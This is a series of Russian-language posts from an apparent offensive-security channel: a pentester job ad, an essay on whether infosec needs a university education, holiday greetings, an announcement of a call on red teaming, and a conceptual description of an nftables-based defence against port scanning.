• Проведение проектов по тестированию на проникновение (внешняя и внутренняя инфраструктура в т.ч СУБД, системы виртуализации и контейнеризации)
• Поиск и эксплуатация уязвимостей веб и мобильных приложений
• Поиск и эксплуатация уязвимостей и недостатков конфигурации ОС Linux а также специфичных для нее сервисов
• Поиск и эксплуатация уязвимостей OC Windows и недостатков конфигурации Active Directory
• Участие в проведение киберучений (Purple Teaming) в формате активного взаимодействия с подразделениями SOC (разработка и реализация сценариев и тест-кейсов киберучений)
• Оформление найденных уязвимостей для отчетов по итогам проектов

❤️ Что для этого нужно:
• Знание любого языка программирования на уровне достаточном для понимания/создания эксплойтов и автоматизации задач по поиску уязвимостей
• Опыт проведения проектов по анализу защищенности веб и мобильных приложений
• Опыт проведения проектов по тестированию на проникновение (внешняя и внутренняя инфраструктура)
• Опыт поиска и эксплуатации уязвимостей веб и мобильных приложений
• Опыт поиска и эксплуатации уязвимостей ОС Linux
• Опыт поиска и эксплуатации уязвимостей и недостатков конфигурации AD

🤪 Будет плюсом:
• Образование (бакалавр, магистр) в одном из технических вузов РФ (МИФИ, МГТУ им. Баумана, МГУ)
• Выступления на крупных конференциях и митапах, например PHDays, OffZone, Standoff и других
• Наличие профильных сертификатов (OSCP, OSWE, OSEP, CRTO)
• Участие в CTF и Bug Bounty

🔥 Что мы предлагаем
• Полная удаленка или свободное посещение офисов в Москве и Санкт-Петербурге
• Оформление в аккредитованную IT-компанию (с поддержкой условий IT-ипотеки)
• Бесплатное питание при работе из офиса
• Скидки у партнеров по обучению и внутренний корпоративный университет
• ДМС со стоматологией (после 3-х месяцев испытательного срока)
• Оплачиваемые Day Off
• Еженедельные развлекательные события - от бизнес-завтраков до просмотра фильмов на проекторе в офисах

Контакты: @virecruiter 👀 или можно ко мне в ЛС

PurpleBear

17 January 2025 08:00

Нужно ли классическое образование в ИБ?

Именно такой заголовок статьи натолкнул меня на филосовские мысли для этого пятничного поста🤓
Я часто слышу мнения относительно того, что академический поход имеет ряд серьезных недостатков, якобы в университетах учат только теории, многие технические гении современности вообще не имеют образования, а Диффи-Хеллман это просто какой-то мужик с двойной фамилией😂 и прочие агрументы.

Так нужно ли классическое образование в ИБ?
Краткий ответ: нет, но нужно гораздо большее

Абсолютно согласен с этим тезисом и поддерживаю мнение автора. Все знать невозможно по определению, но именно навыки полученные в ВУЗе позволяют быстро впитывать огромные объемы информации за короткие сроки, выделять самое главное и фильтровать воду. Этот скилл очень важен для пентестеров, так как в своей работе мы ежедневно имеем дело с огромным количеством различных технологий и необходимо в кратчайшие сроки разобраться в каждой из них и найти уязвимости и недостатки влияющие на безопасноть. Например, есть условный админ, который много лет работает с определенным ПО, который знает все тонкости и нюансы этой конкретной технологии, а против него пентестер, которому за короткий срок проекта надо найти баги и недостатки конфигурации, которые мог допустить этот админ😎

К тому же студенческое время это очень веселый период жизни, который через много лет можно будет вспоминать с теплотой и улыбкой. Университетские друзья это обычно друзья на всю жизнь, с которыми вместе преодолевали все трудности, радовались успехам и отмечая очередное окончания сессии после вечеринки могли проснуться на другом конце света, в тропиках...в пуховике😂 В прошлом году я начал немного преподавать в МИФИ и часто говорю студентам, что важно удерживать баланс между учебой и жизнью, не зацикливаться на чем то одном и получать удовольствие от всего что делаете😎 Поэтому не забывайте развлекаться и отдыхать в том числе!

А что вы думаете на эту тему? Предлагаю немного подискутировать в комментариях🙏

PurpleBear

31 December 2024 13:00

Поздравляю с наступающим Новым годом!🥳

Желаю, чтобы счастье и удача стали для Вас верными спутниками в Новом году!
Желаю крепкого здоровья Вам и вашим близким, пусть весь 2025 год сопровождают только радостные события, позитивные эмоции и успех во всех начинаниях!
Желаю прожить этот год, как хочется, радоваться жизни, ни о чем не сожалеть, не сомневаться и не терять уверенность в себе!
Желаю, чтобы под волшебный звон бокалов начался новый и интересный этап жизни!

С наступающим Новым годом!🎉🎉🎉 До встречи в 2025❤️

PurpleBear

23 December 2024 11:54

Давно у нас не было созвонов сообщества, все под конец года заняты... Огромное спасибо Вадиму за выделенное время 💜

Созвон сообщества в Zoom 26.12 в 19:00
Гость: Вадим Шелест (Wildberries) @purple_medved
Тема: Поговорим о наступательной кибербезопасноти, различных форматах тестирований на проникновение, затронем набирающую популярность тему APT Bugbounty. Обсудим концепцию создания внутреннего Red Team подразделения, ключевые различиях между внутренними и внешними командами, цели и задачи подразделения, состав, специализацию и навыки участников команды, методы и формат взаимодействия со смежными командами. Рассмотрим тенденции рынка, перспективы стартапов в отрасли наступательной кибербезопасноти и многое другое.

Приходите, будет интересно! максимальный репост поддерживается

Подключаться по ссылке
Событие добавлено в календарь мероприятий Ever Secure, добавляй к себе, что бы не пропустить 😉

📹EverSecure">YT | 📺RT | 📺ever_secure">VK | 💰Bty
👀@ever_secure

PurpleBear

16 December 2024 14:32

Я очень редко делаю репосты, но после доклада Паши на VK Security Confab были вопросы - как именно мы строили VM as Code😎 которые теперь можно задать автору напрямую в комментариях☝️
Как говорится ставьте лайк, подписывайтесь на канал и стройте свои IaC сканеры)

PurpleBear

16 December 2024 07:07

Этим летом на канале была заметка про PortSpoof - метод эффективного противодействия активной разведке и сканированию портов, который можно реализовать за 5 минут на iptables. Сегодня хочу познакомить вас с эволюцией этого метода, решением которое реализовано на Rust c использованием nftables и детально описанно в блоге Synacktiv.

Но для начала немного теории, nftables - это инструмент использующий netfilter, как основной компонет для взаимодействия с сетевым стеком ядра Linux, а именно возможностью управлять фильтрацией траффика и перенаправлением пакетов. Архитектурно это реализовано следующим образом, netfilter пропускает пакеты через цепочки (chains), которые являются упорядоченным списком правил (rules) для каждого семейства протоколов сгрупированного в виде таблиц (tables), а каждое правило может содержать критерии - определенное действие или переход. Когда пакет проходит через цепочку, netfilter по очереди проверяет, соответствует ли пакет всем критериям очередного правила, и если так, то выполняет действие (если критериев в правиле нет, то действие выполняется для всех пакетов, проходящих через правило).

Для реализации данного метода противодействия сканированию используются правила содержащие критерий Send a packet to userspace for further analysis, которое с помощью nfnetlink_queue позволяет отправить пакеты программе для автоматической блокировки IP-адреса источника, который стучится на закрытые порты нашего сервера более определенного количества раз.

Дочитав статью до конца вам станет понятно, что сам nftables умеет делать так самостоятельно, но лично мне как и автору понравилось небольшое погружение в Rust😎

Таким образом, предложенное решение отлично работает на практике и каждый день блокирует десятки адресов различных сканнеров моих внешних тачек.